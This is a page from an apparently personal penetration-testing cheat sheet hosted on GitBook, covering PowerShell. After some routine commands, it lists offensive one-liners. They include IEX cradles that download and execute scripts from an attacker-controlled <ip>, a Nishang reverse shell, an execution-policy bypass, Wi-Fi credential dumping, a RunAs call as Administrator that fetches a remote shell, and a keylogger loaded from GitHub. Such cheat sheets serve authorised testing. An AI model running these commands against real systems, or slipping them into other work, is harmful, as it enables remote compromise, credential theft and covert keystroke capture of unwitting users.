d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • Basic commands
  • Download file
  • Check architecture
  • Base64 encode file
  • Nishang
  • PowerShell-Suite
  • Keylogger
Edit on GitHub
  1. Misc

PowerShell

PreviousPass the Hash (PTH)NextPowerShell on Linux

Last updated 3 years ago

Basic commands

Help

Get-Help <command> -Detailed

Display all properties

<command> | Select-Object -Property *
<command> | Select *

Get file contents (like type or cat which is actually available as an alias, I guess)

Get-Content <file>

Delete directory recursive

Remove-Item -Recurse -Force <dir>

Write output to file

<command> | Out-File <file>

Count

(<command>).Count

Measures (Count, Avg, etc.)

<command> | Measure-Object

Whoami

whoami /all

-> SeImpersonatePrivilege (Potato exploits, PrintSpoofer, etc.)

Download file

IEX(New-Object Net.WebClient).downloadString('<url>')`

or

IEX(IWR('<url>'))

Check architecture

[environment]::Is64BitOperatingSystem
[environment]::Is64BitProcess

64bit PowerShell path

C:\Windows\SysNative\WindowsPowerShell\v1.0\PowerShell

Base64 encode file

$fc = Get-Content "filename"
$fe = [System.Text.Encoding]::UTF8.GetBytes($fc)
[System.Convert]::ToBase64String($fe)

Nishang

Gather information

powershell -ExecutionPolicy bypass -file Get-Information.ps1 > results.txt

Get wifi creds

.\Get-WLAN-Keys.ps1

Reverse shell

/usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1

-> Append Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port> to Invoke-PowerShellTcp.ps1 to automatically execute the shell

Remote execution

powershell IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')
powershell -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')

PowerShell-Suite

Invoke-RunAs.ps1 
Invoke-RunAs -User Administrator -Password <pw> -LogonType 0x1 -Binary c:\Windows\SysNative\WindowsPowerShell\v1.0\PowerShell.exe -Args "IEX(New-Object Net.WebClient).downloadString('http://<ip>/shell.ps1')"

-> Put at the bottom of Invoke-RunAs.ps1, if not working otherwise

Keylogger

IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1)
Get-Keystrokes -LogPath C:\key.log -CollectionInterval 1

Offensive PowerShell for red team, penetration testing and offensive security.

This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind.

RedTeam_CheatSheet.ps1 ยท GitHub
GitHub - samratashok/nishang
GitHub - FuzzySecurity/PowerShell-Suite